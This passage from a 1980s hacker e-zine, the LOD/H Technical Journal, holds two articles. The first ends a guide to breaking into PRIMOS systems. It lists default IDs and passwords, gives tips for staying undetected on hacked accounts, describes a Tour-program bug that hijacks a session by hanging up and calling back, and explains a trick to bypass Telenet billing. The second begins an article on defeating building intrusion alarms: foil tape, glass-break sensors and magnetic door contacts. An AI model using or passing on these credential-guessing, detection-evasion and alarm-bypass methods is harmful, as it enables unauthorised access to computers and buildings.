  819. running and passwords will be needed. I am not going to go into detail on
  820. version 18 because it is obselete, any questions regarding version 18 please
  821. leave me mail.
  822.  
  823.  
  824. [Logging in V19.x.x]
  825.  
  826.   A Primos system is very easy to recognize.  Once you are connected,
  827. hit a few returns to get the "ER!" prompt or you may be prompted
  828. with the ID prompt.  If you do get prompted with the ID prompt, you need
  829. not put "Login" in front of the ID. Here is an example of a Primos login:
  830.  
  831. ATDT 123-4567
  832.  
  833. [2 RETURNS]
  834.  
  835. ER! Login CARRIER
  836. Password:
  837.  
  838.  Prime (user 31) Logged in Friday, 5-Sept 14:27:20
  839.  Welcome to  Primos Version 19.4.5
  840.  Last login Thursday, Sept 4 1986 02:01:12
  841.  (1 mail waiting)
  842.  
  843.  Note: You usually get 1 try to login before being disconnected.
  844.  
  845.   In some cases the 2 c/r's are not needed and some systems won't respond until
  846. you type "login" and a return. Passwords and ID's are 6 characters, they may
  847. consist of letters and numbers.  Finding passwords on a Primos can be hard, but
  848. there are some common ID's and passwords.  You must use "login" before entering
  849. your ID.  In this case my ID is "CARRIER".  Here is a common list of ID's and
  850. passwords I have come accross:
  851.  
  852.   ===============================
  853.   |  ID name     |  Password    |
  854.   ===============================
  855.   |  PRIME       |  PRIME       |
  856.   | *SYSTEM      |  SYSTEM      |
  857.   |  PRIMOS      |  PRIMOS      |
  858.   | *ADMIN       |  ADMIN       |
  859.   |  RJE         |  RJE         |
  860.   |  DEMO        |  DEMO        |
  861.   |  GAMES       |  GAMES       |
  862.   |  GUEST       |  GUEST       |
  863.   |  REGIST      |  REGIST      |
  864.   |  TEST        |  TEST        |
  865.   |  NETMAN      |  NETMAN      |
  866.   |  PRIRUN      |  PRIRUN      |
  867.   |  TOOLS       |  TOOLS       |
  868.   |  CMDNC0      |  CMDMNC0     |
  869.   | +TELENET     |  TELENET     |
  870.   ===============================
  871.  Note: * means that that ID is most likely to have SYS1 priorities.
  872.  Note: + account belongs to Telenet or some employees of Telenet in which the
  873.          Primos will be located on the Telenet packet network.
  874.  
  875. System Accounts:
  876.  
  877. SYSTEM- This account usually contains configuration programs.  It
  878.         also contains system messages, logs, and userlists.
  879.  
  880. TOOLS-  This account usually contains the utility to add users and the Netlink
  881.         utility (Explained later).
  882.  
  883. CMDNC0- Contains help files.
  884.  
  885.   These are default accounts which are standard in new Primos systems. They
  886. should be there unless the userfile has been modified by the system operator.
  887.  
  888.   You can also mix them around, ie- Login SYSTEM  Password:PRIME
  889. There is no "systat" or extensive on-line help before logging in. Don't you
  890. wish people would model their operating systems after TOPS-10 (chuckle)?  The
  891. best account to get on under would be an account with SYS1 priorities. This
  892. account is for people who advise regular users.  Ok, lets assume you have
  893. hacked onto a regular account something like games.
  894.  
  895.   The command prompt for Primos is "OK,".  The first thing we would
  896. want to do is to see who is logged in. We would type "Users" and
  897. would get something like this:
  898.  
  899.  OK, Users
  900.  Users=8
  901.  
  902.   This is telling us that there are 8 users currently logged in, which isn't
  903. extremely helpful. To get a full listing of usernames we would type "Status
  904. Users" or "Status -Users".  We would get a status of users currently on-line.
  905. It would show us usernames, devices, and other sub-categories.  Here's a sample
  906. of what you would get:
  907.  
  908. User                  Number         Device
  909. ADMIN                   3            <MDF0>
  910. SYSTEM                  1            <MFD0> <MFD1>
  911. OBB                    31            <MFD0>
  912. CRIMINAL               12            <MFD1>
  913.  
  914.   If you see that other people are logged in, it may be best to log off and
  915. call back later, as the operators can perform the same command, and if they
  916. know that user should not be on the system at that time, you will obviously be
  917. kicked off.  If there are 2 devices specified, the user is either receiving
  918. output from a different device, sending input to that device, or has logged out
  919. incorrectly (tsk tsk).
  920.  
  921.   To get a full status of memory and accounting, you would type "Status System"
  922. This is usually in a Menu driven program, and you will get different options.
  923. ie- Log of users, memory, devices, etc.
  924.  
  925.   We can access different priority levels by using the "CHAP" command.  This is
  926. the way we can find out what our priority level is. We would do:
  927.  
  928. OK, CHAP UP
  929.  
  930. OK, CHAP DOWN X or CHAP DOWN
  931.  
  932.  to return to your original priority level:
  933.  
  934. OK, CHAP ORIGIN or CHAP DEFAULT
  935.  
  936.   Usually a user may leave his priority level rather low. You can then try to
  937. raise your level.  There should be 6 different priority levels. A 0 meaning
  938. lowest, and 6 meaning highest.  Here is a little diagram that will give you a
  939. list of ID's and what most of them will have access to.
  940.  
  941. Note: Some may have access to more or less than what I have written, but
  942.       the comments are accurate for most systems.
  943.  
  944.        !=================================================!
  945.        !     ID         !          Comments              !
  946.        !=================================================!
  947.        !   GAMES        !Allows user to view low level   !
  948.        !                !directories, and execute regular!
  949.        !                !commands. ie-CHAP, STATUS       !
  950.        !=================================================!
  951.        !   DEMO         !Allows user to run games, and   !
  952.        !                !execute the tour program.  Most !
  953.        !                !commands will not work, and it  !
  954.        !                !has a time limit. Lastly, it can!
  955.        !                !only access low lvl directories.!
  956.        !=================================================!
  957.        !   PRIME        !Allows user to execute all      !
  958.        !                !commands, except operator cmds. !
  959.        !                !User can also access PRIMENET if!
  960.        !                !the system supports it.  Access !
  961.        !                !to only low level directories.  !
  962.        !=================================================!
  963.        !   ADMIN        !Access to view all directories &!
  964.        !                !bypass all ACL'S.  Can setup an !
  965.        !                !accounts on other Primos systems!
  966.        !                !via PRIMENET (if available).    !
  967.        !                !User can execute any command.   !
  968.        !=================================================!
  969.        !  SYSTEM        !Same as ADMIN, except cannot    !
  970.        !                !view feedback to ADMINS.        !
  971.        !=================================================!
  972.        !  RJE           !Same as games, except a RJE     !
  973.        !                !user can erase user log and spy.!
  974.        !=================================================!
  975.        !  TEST          !Able to access any directory,   !
  976.        !                !only restriction is a test user !
  977.        !                !is not authorized to shut down  !
  978.        !                !the system.                     !
  979.        !=================================================!
  980.        Note: RJE is a Remote Job Entry
  981.  
  982.   Priority levels may vary on different Primos systems, they can range from
  983. 0- to any number up to 10.  The most common range is 0-6.  On some Primos
  984. systems you can do a CHAP PRIORITY to see what the range is.
  985.  
  986.   Ok, we have checked priorities, and the system status.  Lets move to
  987. directories.  To list a directory type "LD" short for List Directory.
  988. This will list the directory you are attached to.  In this case it
  989. will be your home directory.  You will get a list of files within your own
  990. directory.  To view someone elses directory you would type AT nameofdirectory.
  991. Lets say we are logged into a DEMO account.  And we would like to
  992. view the files in the GAMES account.  We could do either of the following:
  993.  
  994. OK, AT GAMES
  995.  
  996. This is telling the system we would like to default to the Games directory.
  997. This is similar to the Set Default name on a VAX/VMS system. (See Lex Luthor's
  998. Hacking VAX/VMS 3 part series for more information on VMS)
  999.  
  1000. or we could do
  1001.  
  1002. OK, FUTIL
  1003. >AT GAMES
  1004.  
  1005.   This is the same thing, except in the first method you can still execute
  1006. Primos commands while still attached to the Games account.  But when using
  1007. FUTIL (File UTILity program) you can only list,  create and copy files.  To get
  1008. out of the file utility program just hit a Control P. Here is a chart of file
  1009. types and how to execute them:
  1010.  
  1011. -------------------------------------------
  1012. |   File type    |    How to execute it   |
  1013. ===========================================
  1014. |     .CPL       | CPL pathname           |
  1015. |     .SAVE      | SAVE pathname          |
  1016. |     .SEG       | SEG pathname           |
  1017. |     .BASICV    | BASICV pathname        |
  1018. |     .TXT       | SLIST pathname         |
  1019. |     .COM       | CO pathname            |
  1020. -------------------------------------------
  1021. Note: SLIST will also show the program lines of the file, whether it be a
  1022.       CPL file or COM file.  This is a good way to learn CPL (Command Procedure
  1023.       Language).
  1024.  
  1025.   Most files will not have suffixes.  To execute them type "Resume pathname",
  1026. filenames are called pathnames on PRIMOS.  Unlike VMS, the PRIMOS system
  1027. doesn't have the type of file as a suffix.  On some files you'll get the
  1028. suffix, but if not try: Resume pathname and that should execute the file,
  1029. especially files with an "*" preceding them.  If a file is in the format of,
  1030. "*filename" do "Resume *filename".  Usually basic files have an * preceding
  1031. their titles.
  1032.  
  1033. To create a directory type:
  1034.  
  1035. OK, Create directname [-password] [-access]
  1036.  
  1037.   A password can be from 1-6 letters, if I wanted to have a password on
  1038. my directory I would do-
  1039.  
  1040. OK, Create directname [-limp] [-access]
  1041.  
  1042.   If you don't put in an access level, the directory will automatically be
  1043. set to ALL access.  Here's a list of access rights:
  1044.  
  1045.       P         =       Protect a directory
  1046.       D         =       Delete entries from directory
  1047.       A         =       Add entries to directory
  1048.       L         =       Read the contents within directory
  1049.       U         =       Attach to a directory
  1050.       R         =       Read contents of a file
  1051.       W         =       Edit contents of a file
  1052.     ALL         =       All of the Above^^^^^
  1053.    NONE         =       Denies all access
  1054.  
  1055.   Typically, if you are logged into a DEMO account your directory will be set
  1056. to ALL access.  If it is, someone can attach to the demo directory and
  1057. do anything they want with it.  Here is a list of accounts and what access
  1058. they will usually have on their directory.
  1059.  
  1060.          DEMO      =    ALL
  1061.          GAMES     =    LUR
  1062.          PRIME     =    ALL
  1063.          SYSTEM    =    LUR
  1064.          ADMIN     =    NONE
  1065.          TEST      =    LUR
  1066.          JBB       =    NONE
  1067.          RJE       =    LUR
  1068.  
  1069.   Most directories have LUR access which is access to read contents of the
  1070. directory, attach to the directory, and read contents of a file.  If
  1071. you have enough privileges (priority levels) you can do the following to
  1072. change the access rights:
  1073.  
  1074. OK, Set_Access ALL [-LUR]
  1075.  
  1076.   This is setting access from ALL to LUR.  ALL was the present access, now we
  1077. changed it to LUR.  You should only do this if it's your own personal account
  1078. as changing access rights on hacked accounts could lead to your detection and
  1079. subsequent expulsion from the system.
  1080.  
  1081.   To create a file, preferably a text file, type "Mail pathname", then you will
  1082. be thrown into the Mail subsystem which I believe is version 3.1 now.  You can
  1083. type in all the info you want, when finished hit a Control-P.  It will ask you
  1084. for a pathname to save it to.  Enter the name you would like.  It will look
  1085. something like this:
  1086.  
  1087. OK, Mail DOE
  1088.  
  1089.   Mail 3.1
  1090. >Hello.  This is your system operator.  Any ideas on how to keep those
  1091. >pesky little computer criminals out of our system?
  1092. >Comments can be directed to SYSTEM.
  1093. Enter Filename: Pesky.Txt
  1094.  
  1095. The above method is rather primative but works good if you are only creating a
  1096. text file.  It is a common method used on version 18, and is easy to perform.
  1097. The other method is more common on version 19, and is commonly used today.
  1098.  
  1099. OK, Create Test.Txt
  1100. OK, Ed
  1101.  
  1102. EDIT
  1103. $
  1104. Note: $ is not dropping you into DCL, so you DCL programmers are out of
  1105.       luck (chuckle).
  1106.  
  1107.   From the $ prompt you can type 'help' to get a list of commands which can be
  1108. used in the Editor.
  1109.  
  1110. $ (return)
  1111.  
  1112.   By hitting return we are givin the "&" prompt, here we can input our
  1113. file.  Or if you know CPL you can start programming.  Do not hit return
  1114. on a blank line or you will be thrown into the main Editor prompt ('$').
  1115.  
  1116. & Hello this is Bif (the system operator) I am testing the Editor
  1117. & because we have added new enhancements.  This is only a test.
  1118. & (return)
  1119.  
  1120.   Thus by hitting return we are givin the $ prompt once again.  To
  1121. save our file we can type-
  1122.  
  1123. $ Save Test
  1124.  
  1125.   In this case the filename is test.  The system will reply by saying
  1126. 'Test Saved'.  The file should be located at the end of the files list
  1127. when you List files.
  1128.  
  1129.   To make sure the contents are saved type "Slist Test.Txt", it will display
  1130. the text you typed in mail or the editor.  A couple of important notes:
  1131.  
  1132. 1: Never use a "?" anywhere in the file, or it will erase all of the contents
  1133.    in the file.
  1134. 2: Never hit a c/r twice.  In other words if you hit a c/r on a blank line the
  1135.    system will recognize this as mail and will send it to the name you entered.
  1136.  
  1137.   If you want to make a basic program or basicv type "Basic" or "BasicV"
  1138. at the "Ok," prompt and you will be thrown into that language.  If you
  1139. would like to make a CPL program you can enter it from the main prompt since
  1140. that is the default language for Primos.
  1141.  
  1142.   To delete a file just type "Delete filename".
  1143.  
  1144.   To get a list of directories with their ACLs (Access Control Lists) type
  1145. "List_Access".  It would look something like this:
  1146.  
  1147. OK, LIST_ACCESS
  1148.  
  1149.       ACL  "<Current Directory>":
  1150.  
  1151.       ADMIN : NONE
  1152.        DEMO : LUR
  1153.      SYSTEM : LUR
  1154.      ROBERT : ALL
  1155.       GAMES : LUR
  1156.       PRIME : ALL
  1157.  
  1158.  
  1159.   To get a listing of just files type "Listing", it will give you a list
  1160. of files in the directory you're attached to.  The only difference between
  1161. this method and "LD" is that LD tells you what access rights is on that
  1162. directory.
  1163.  
  1164. <Tour Program>
  1165.  
  1166.   On some Prime systems you may find a program located within the Demo or Games
  1167. account.  The name of the program is "Tour" and you can execute it by doing CPL
  1168. Tour.  The program will be inputting commands and the system will execute them.
  1169.  There is a bug within that program which can be used to your advantage.  First
  1170. execute it by doing CPL Tour, once the program has begun it will have a couple
  1171. of pauses (while it is loading).  First hit 3 Control P's.  By doing this you
  1172. are breaking out of the program.  Next, attach to the SYSTEM directory.  Once
  1173. attached, SLIST the Tour program (Slist Tour).  When it begins listing the file
  1174. do a Ctrl-P again.  Now, go into the editor (ED).  When you receive the $
  1175. prompt hangup on the system.  The system is now hung in the Editor, and the
  1176. Tour program is still executing (from the Demo or Games account). You must call
  1177. right back (and prey that the line hasn't been captured by a system operator).
  1178. You will be put right into the tour program, while it is being executed.  You
  1179. will need no pw to login as you are attached right to it.  You now have access
  1180. to write and read anything your little heart desires.  If you plan on trying
  1181. this, do it at night, since you will most likely be the only one on the system.
  1182.  Always do it on a 1 line system.  Never on a Prime that is used constantly
  1183. (unless you have perfected this method).  Remember to call right back after you
  1184. have hung up, or someone like BIF may call and wonder why he did not get the ID
  1185. prompt.  So be careful.
  1186.  
  1187.   I also know different ways you can modify the tour program to have
  1188. a little fun (using CPL commands) but due to obvious reasons I will not
  1189. publicize the lines.  If you are interested please get in contact
  1190. with me.
  1191.  
  1192. <Message>
  1193.  
  1194.   To send a message to someone on the system type "Message username". It would
  1195. look something like this:
  1196.  
  1197. OK, Message PRIME
  1198. Hi, can you tell me why the system was down last week.
  1199.  
  1200. Note: Remember DON'T use ?'s.
  1201.  
  1202.   The user PRIME will receive the message, unless he's busy or has executed
  1203. a command which refuses messages.  It would look like this:
  1204.  
  1205. OK, Message Prime
  1206. Hi, can you tell me why the system was down last week.
  1207.  
  1208. User Prime not accepting messages
  1209.  
  1210.   If you do not receive that message then the user will get your message. This
  1211. is like Phone username on VMS, except on a VMS it looks better (chuckle).
  1212.  
  1213. <Mail>
  1214.  
  1215.   To send mail you type: "Mail xxxxx".  If I wanted to send mail to user
  1216. SYSTEM, I would type "Mail System", I would be thrown into the mail subsystem.
  1217. To end a message hit a c/r on a blank line.  You will be notified when you get
  1218. mail when you first logon.  It will say "(mail waiting)".  To read it type
  1219. "Mail".  If you have no mail and you type Mail it will say "sorry no mail
  1220. today".  Once again no ?'s are allowed or the contents of the mail will be
  1221. erased.
  1222.  
  1223. <Status>
  1224.  
  1225.   Status followed by a topic will give you a system status on that topic.  You
  1226. can get information on the following using Status-
  1227.  
  1228. Status ALL        =      Information on who is logged in and devices.
  1229. Status DI         =      Information on devices, what devices are in use.
  1230. Status SYSTEM     =      Information on what version of Primos is being run.
  1231. Status NETWORK    =      Information on Netlink, and network nodes.
  1232.  
  1233.   There are others but these are probably the most important, and of course,
  1234. "Status Users" which I mentioned earlier, which will give you a list of users
  1235. currently logged in.
  1236.  
  1237. <Change_Password>
  1238.  
  1239.   Allows a user to change his password.  It will look something like this:
  1240.  
  1241. OK, Change_Password
  1242. Old Password:Z102345
  1243. New Password:
  1244. Verfication :
  1245.  
  1246.   Notice how new password and verification don't echo, this is for security
  1247. purposes so don't be alarmed.  Changing passwords of hacked accounts is not a
  1248. good idea. We don't want to get detected now do we?
  1249.  
  1250. <Info>
  1251.  
  1252.   Gives info on the system. ie-who it belongs to, what version its running
  1253. on and new features.
  1254.  
  1255. <Languages>
  1256.  
  1257.   Gives a list of languages the system supports.
  1258.  
  1259. <Help>
  1260.  
  1261.   Gives a list of help commands and a small description.
  1262.  
  1263.  
  1264. <Netlink>
  1265.  
  1266.   By typing Netlink at the main prompt (OK,) you will be thrown into the
  1267. Netlink utility.  Netlink is found on Primenet (which is the networking
  1268. software for Primes).  Netlink is used to communicate with other remote
  1269. systems.  You will find the netlink utility on most packet networks, since
  1270. there is much use for it there.  Netlink can be accessed by all users on
  1271. the system.  Once netlink is typed you will get a message, similar to:
  1272.  
  1273. Netlink version x.xx
  1274. >(this being the main prompt)
  1275.  
  1276.   Once again on-line help is available if you have no idea what you are
  1277. doing.  To call another system, you would use the NC xxxxxx format.
  1278. If you were on Telenet using Primenet supporting the Netlink utility you
  1279. could call any system on Telenet.  For example if I wanted to call my
  1280. favorite VMS I would type-
  1281.  
  1282. >NC 201111
  1283.  
  1284.   201111 being the address.  You will get a pause for about 5 seconds and you
  1285. will be connected to the remote system.  It is fairly slow, but it is
  1286. sufficient.  The whole process would look something like this-
  1287.  
  1288. OK, NETLINK
  1289.  
  1290. Netlink [Version 1.x]
  1291.  
  1292. >NC 201111
  1293. <Pause for about 5 seconds>
  1294.  
  1295. Username:
  1296. Password:
  1297.  
  1298.   Username and Password shows that I have connected to the Vax running VMS. I
  1299. would log onto the remote system (the VMS in this case) like I would any other
  1300. time.  Once I am done looking around on the remote system I can just logoff by
  1301. doing a Control P (this will put you back into the utility), or I could just
  1302. logoff properly by using the VMS logout command and be put back into the
  1303. Netlink utility program.
  1304.  
  1305.   If you ever receive the message "WILL NOT ACCEPT COLLECT CONNECTION" from a
  1306. system off of Telenet, you can just reverse the charges to the Prime you are on
  1307. and log onto the remote system.  You can do this by using the NC format above.
  1308. This allows you to bypass the need for a Telenet ID.
  1309.  
  1310.   Netlink won't compare to something like DECNET but it gets the job done.
  1311. Remember if you aren't too sure what you are doing just type "help" for on-line
  1312. help.  To exit the Netlink utility type "Quit" or just hit Control-P.  This
  1313. will give you the main prompt once again.
  1314.  
  1315. <Upcase/Lowcase>
  1316.  
  1317.   Toggles upper and lower case.
  1318.  
  1319. <Control characters>
  1320.  
  1321. Control S = Pauses Text
  1322. Control P = Aborts Text or Utility
  1323. Control Q = Resumes Text
  1324.  
  1325. <Author Notes>
  1326.  
  1327.   If you gain access to Primos supporting on-lines games, which can be found by
  1328. (AT)taching to the Games directory.  There may be a game called "FRITZ", it's a
  1329. fun game dealing with questions on the Primos system.  It can also test your
  1330. knowledge on the system.
  1331.  
  1332.   Usually if a person hangs up on the system without properly logging off you
  1333. may be able to call the system and be attached to that account.  This usually
  1334. works on systems with one line.  I called a Primos one day and was attached to
  1335. a system account modifying a config program.  It was interesting...
  1336.  
  1337. There are many Prime systems on Telenet so I suggest getting ahold of the
  1338. updated LOD/H Telenet Directory from Issue I and jot down a few.  Preferably
  1339. Primenet, since they support the Netlink utility.
  1340.  
  1341. ============================================================================
  1342.  
  1343. Here's a list of some major differences between PRIMOS version 18.x.xx and
  1344. Version 19.x.xxx
  1345.  
  1346.  1.  Version 19 supports Access Control Lists, which allows the user to set a
  1347.      specific access right on his/her directory.
  1348.  2.  Version 19's security has been tightened.  A user will be prompted with
  1349.      the password prompt.  A user is usually allowed only 1 unsuccesful login,
  1350.      if the ID or password is incorrect the user will be logged off.
  1351.  3.  Once a user has tried to execute a command/file without sufficient
  1352.      access rights he will be logged off of the system.  The account will
  1353.      automatically be suspended until an operator has contacted the user.
  1354.  4.  Users have to change their password every 30 days.
  1355.  5.  The "CHAP" command can be executed by users to toggle their priority
  1356.      level.
  1357.  6.  Netlink has been enhanced with more commands.
  1358.  7.  A primary password may be used for better security.
  1359.  8.  After logging out you will be disconnected from the system, rather
  1360.      than prompted with the ER! prompt.
  1361.  9.  Dec VT132 is the commonly used operator terminal on version 19.
  1362. 10.  There have been new enhancements to the editor.
  1363. =============================================================================
  1364.  
  1365.   As you can see, PRIMOS is a very versatile system. It's not very popular
  1366. among hackers since there hasn't been too much information released on it.
  1367. Most commands will be the same on version 18, if not just execute the Help
  1368. file. The final element to PRIMOS will be alarm (it will be similar to the one
  1369. on VMS).  I will go a little more in-depth on the ALARM system in Part II (I
  1370. will have more information on it, and by that time it will be inserted in later
  1371. revisions of version 20).  Basically the alarm will record all unsuccesful
  1372. logins and will alert the operator at the terminal.  The alarm will be a
  1373. standard part of PRIMOS and can not be shut on and off, from a reliable source,
  1374. the alarm may come in a different package.
  1375. =============================================================================
  1376.  
  1377. Part II:  I will discuss new commands, creating accounts, go more in-depth on
  1378.           the Netlink utility, and any other changes in PRIMOS Version 20.
  1379.  
  1380.  
  1381. Until then....
  1382.  
  1383. You can reach me via the TJ staff account, for questions, requests for more
  1384. information, and corrections to this article.
  1385.  
  1386. The LOD/H Technical Journal: File #5 of 10 (ISSUE #2)
  1387.  
  1388.  
  1389.              Lex Luthor and The Legion Of Doom/Hackers Present:
  1390.  
  1391.              Identifying, Attacking, Defeating,  and Bypassing
  1392.              Physical Security and Intrusion Detection Systems
  1393.  
  1394.                           PART II: THE EXTERIOR
  1395.  
  1396.  
  1397.  
  1398. INTRODUCTION:
  1399. -------------
  1400.  
  1401. The 'exterior' refers to the area directly outside of a building and the things
  1402. within the building which are on the exterior. These obviously are: doors, air
  1403. conditioning ducts, windows, walls, roofs, garages, etc. I don't believe the
  1404. word 'exterior' is the exact definition of what this article will encompass,
  1405. unlike the 'perimeter', but it's the best I could come up with. This article
  1406. primarily is of an informative nature, although methods of "attacking,
  1407. defeating, and bypassing" will be explained. Its purpose is not specifically to
  1408. encourage you to breach a facility's security, although I acknowledge that it
  1409. could be used as such. Some of the devices mentioned in the physical security
  1410. series are used in homes as well as corporate, industrial, and military
  1411. installations, but my aim is specifically towards the commercial aspect of
  1412. buildings, not homes and apartments. Entering a facility to obtain information
  1413. such as passwords or manuals is one thing, breaking into someones' home to
  1414. steal their personal belongings is another.
  1415.  
  1416.  
  1417. THE EXTERIOR:
  1418. -------------
  1419.  
  1420. A facility's second line of defense  against intrusion is its' exterior.  The
  1421. exterior may have any or all of the following:
  1422.  
  1423. * Window breakage detectors
  1424.  
  1425. * Keypad systems
  1426.  
  1427. * Card access control systems
  1428.  
  1429. * Magnetic locks and contacts
  1430.  
  1431. * Security lighting and CCTV
  1432.  
  1433. CCTV which is also used, was mentioned in Part I: The Perimeter.
  1434. Card Access Control devices will be mentioned in Part III: The Interior.
  1435.  
  1436.  
  1437. WINDOWS:
  1438. --------
  1439.  
  1440. Windows are a large security hole for buildings. You may notice that many phone
  1441. company buildings and data processing centers have few if any windows. There
  1442. are two things that can be done to secure windows aside from making sure they
  1443. are locked. One is to make them very difficult to break, and the other is to
  1444. detect a break when and if it occurs. Here is a quick breakdown of the common
  1445. types of glass/windows in use today:
  1446.  
  1447. Plate glass: Can be cut with a glass cutter.
  1448. Tempered: Normally can't be cut. Breaks up into little pieces when broken.
  1449. Safety: You need a hatchet to break this stuff.
  1450. Wire: This has wire criss-crossed inside of the glass, making it very hard to
  1451. break, and even harder to actually go through the opening it is in place of.
  1452. Plexy: Very hard to break, doesn't really shatter, but can be melted with the
  1453. use of a torch.
  1454. Lexan: This is used in bulletproof glass. One of the strongest and most secure
  1455. types of glass.
  1456. Herculite: Similar to Lexan.
  1457.  
  1458.  
  1459. Foil tape:
  1460. ----------
  1461.  
  1462. This is by far the most common, and probably the most improperly installed form
  1463. of glass breakage detection, which also makes it the most insecure. This is
  1464. usually a silver foil tape about 5/16" wide which should be placed on the whole
  1465. perimeter of a glass window or door. In the case of plexyglass or a similar
  1466. material, the tape should be placed in rows separated by 6-12 inches.
  1467.  
  1468. The older foil was covered with a coating of eurathane or epoxy which enabled
  1469. it to stick onto the glass. The newer foil has an adhesive back making
  1470. installation much easier. There should be two connectors which are located at
  1471. the upper top part of a window, and the lower part of the window which connects
  1472. the foil to the processor, thus, completing the circuit. Foil may or may not
  1473. have a supervised loop. If it is supervised, and you use a key to scratch the
  1474. foil (when it is turned off) making a complete break in it, an alarm will sound
  1475. when it is turned on.
  1476.  
  1477. Foil is commonly used as a visual deterrent. Many times, it will not even be
  1478. activated. The easiest way to determine if the facility is trying to 'B.S.' you
  1479. into thinking they have a security system, is to see if there are any breaks
  1480. in the foil. If there is a clean break, the 6-12V DC current which is normally
  1481. making a loop isn't. Thus, breaking the glass will do nothing other than make
  1482. some noise unless you take steps against that happening.
  1483.  
  1484. As was stated, foil is the most improperly installed type of glass breakage
  1485. detection. When it is installed improperly, it will not cover all the area it
  1486. should. An easy way to defeat this is by the following diagram:
  1487.  
  1488. +-------------+
  1489. ! ........... !
  1490. ! .         . !  . = foil tape
  1491. ! . put     . !  - = top/bottom of door
  1492. ! . contact . !  ! = sides of door
  1493. ! . paper   . !  / = dividing line between 2 pieces of contact paper
  1494. ! . in      . !  $ = ideal places for initial breakage
  1495. ! . this    +-!  ' = clear area or outline of second piece of contact paper
  1496. ! . area    ! !  <-- door handle
  1497. ! .         +-!
  1498. ! .         . !
  1499. ! ........... !
  1500. !/////////////!
  1501. !'''''''''''''!
  1502. !'           '!
  1503. !$'''''''''''$!
  1504. +-------------+
  1505.  
  1506.  
  1507. As you can see, the installer neglected to place the foil all the way down to
  1508. the bottom of the glass door. There is enough room for a person to climb
  1509. through. They may have thought that if someone broke the glass, it would all
  1510. break, which is normally correct. But if you obtain some strong contact paper,
  1511. preferably clear, adhere it to the glass as shown, and break the bottom part at
  1512. the '$' it will break up to the '/' line and thats it. Thus, leaving the foil
  1513. in-tact. This will work on tempered glass the best, and will not work on Lexan
  1514. or Plexyglass. There is a transparent window film with a break strength of up
  1515. to 100 pounds per square inch which can be obtained from Madico, Inc. It is
  1516. called, Protekt LCL-400 XSR, and makes glass harder to break and stays
  1517. essentially in place even when broken. This can be used in place of the contact
  1518. paper. Obviously, it is also used to protect glass from breakage.
  1519.  
  1520. Audio discriminators:
  1521. ---------------------
  1522.  
  1523. What these do is to compare the frequency of the sound that glass makes when it
  1524. breaks, to the actual breakage of glass. This frequency is relatively unique,
  1525. and can accurately determine when and if glass actually breaks. Your best shot
  1526. at defeating this, is to do the same thing as mentioned above. Cover the glass
  1527. with a film which will keep the glass in place after breaking it. If you break
  1528. it properly, the frequency will not match that of glass breaking when it is not
  1529. held in place.
  1530.  
  1531. Glass shock sensors:
  1532. --------------------
  1533.  
  1534. These devices detect shock disturbances using a gold-plated ring that "bounces"
  1535. off a pair of normally closed gold-plated electrical contacts. This will send
  1536. a signal to a Signal Processor (SP) which determines whether an alarm condition
  1537. exists. There are two settings the SP can be set to which are:
  1538.  
  1539. SHOCK-BREAK: This mode requires an initial high energy shock, followed by a
  1540. very low engery shatter. The shatter must occur within about 1 second before
  1541. an alarm can occur.
  1542.  
  1543. SHOCK-ONLY: An alarm will occur once the first shock is detected. This may or
  1544. may not be accompanied by a shatter.
  1545.  
  1546. Obviously the more secure setting for a facility would be shock-only. Though,
  1547. both are equally dangerous for an intruder. The methods mentioned earlier about
  1548. preventing the glass from shattering will not work when this device is used in
  1549. the shock-only mode. It may work, depending on the type of glass, if it isn't
  1550. in the shock-break mode.
  1551.  
  1552. These devices are usually found protecting large plate glass and multi-pane
  1553. windows. They are roughly 2 inches by 1 inch and can be mounted on the frame of
  1554. a window, between two windows, or on the glass itself. These sensors can cover
  1555. up to 150 square feet of glass.
  1556.  
  1557. These are the best of the lot for window breakage detection. Most devices have
  1558. a constantly supervised loop, and if you cut a wire, that loop will break, and
  1559. cause an alarm condition. They are typically placed somewhere on the window
  1560. pane and not on the window, thus, making them harder to visually detect...from
  1561. the outside that is. Though from close inspection, you may be able to determine
  1562. if these are in place. Obviously they can easily be seen from the inside...
  1563.  
  1564. The sensor is normally placed no more than a couple of inches from the glass.
  1565. If it is too far away, or if you can move one over 4 inches from the glass, its
  1566. detection capability is somewhat diminished. It is probably screwed in, and has
  1567. an adhesive backing, so moving it may not be too easily accomplished. False
  1568. alarms are not common, unless the windows rattle. There are sensors available
  1569. which are not as sensitive, and will not "overreact" to slight vibration, these
  1570. are called "damped" sensors.
  1571.  
  1572.  
  1573. MAGNETIC CONTACT SWITCHES:
  1574. --------------------------
  1575.  
  1576. The word "contact" is somewhat contradictory to how these devices are commonly
  1577. used. In most cases, the magnet and the switch are not in physical contact of
  1578. each other, rather, they are in a close proximity of each other, although
  1579. there are some models which are indeed in contact with each other. There are
  1580. various types and levels of security that these devices possess.
  1581.  
  1582. They can be surface mounted (floor or wall mounted) or concealed (recessed).
  1583. The most common are surface mounted which are placed on top of the door. When
  1584. inspecting for these devices, examine the whole perimeter of the door, from top
  1585. to bottom. Most doors have a +/- 1/4" gap all the way around, in which you
  1586. should also check for concealed contacts. These are round cylinders that are
  1587. recessed into the door or wall, which obviously makes them less visible. The
  1588. other contacts range from miniature, with dimensions as small as 1x1/4x1/4"
  1589. to the larger ones at 5x2x1". They are usually in colors of off-white, grey,
  1590. and brown and are mounted with nails, screws, double sided tape, or are epoxied
  1591. onto the door or wall surface(s). The switches are hermatetically sealed, as
  1592. are the glass breakage detectors mentioned earlier, can operate in moist or
  1593. dusty areas, are corrosion resistant and have indoor/outdoor use. They can also
  1594. be used on windows, fence gates, truck trailors, boats, heavy equipment, safes,
  1595. and vaults.
  1596.  
  1597. The different types of devices in order of least to most secure are:
  1598.  
  1599. 1) Standard Magnetic Contacts: These consist of one reed switch and one magnet.
  1600.    They may be defeated with the use of a second magnet which would be placed
  1601.    in the vicinity of the switch, while opening the door or window and while
  1602.    closing them also. This way, the switch never detects the abscense of the
  1603.    magnet, thus, no alarm occurs.
  1604.  
  1605. 2) Biased Magnetic Contacts: These consist of one reed switch with a "biasing"
  1606.    magnet that changes the state of the reed switch. The magnet is then placed
  1607.    at the correct distance to offset the bias magnet, creating a "balanced"
  1608.    condition. The switch can be defeated with the use of a single magnet. The
  1609.    trick is to:
  1610.  
  1611.      A) You must have the correct size magnet, which can be accomplished by
  1612.         obtaining the same type or model as what is in place.
  1613.  
  1614.      B) You must determine the correct polarity which may be accomplished with
  1615.         either a compass, or if the alarm is not activated, (possibly during
  1616.         normal business hours), by opening the door and placing your magnet
  1617.         near the device's magnet and determine the polarity. If you do not have
  1618.         much time, then its a 50-50 shot.
  1619.  
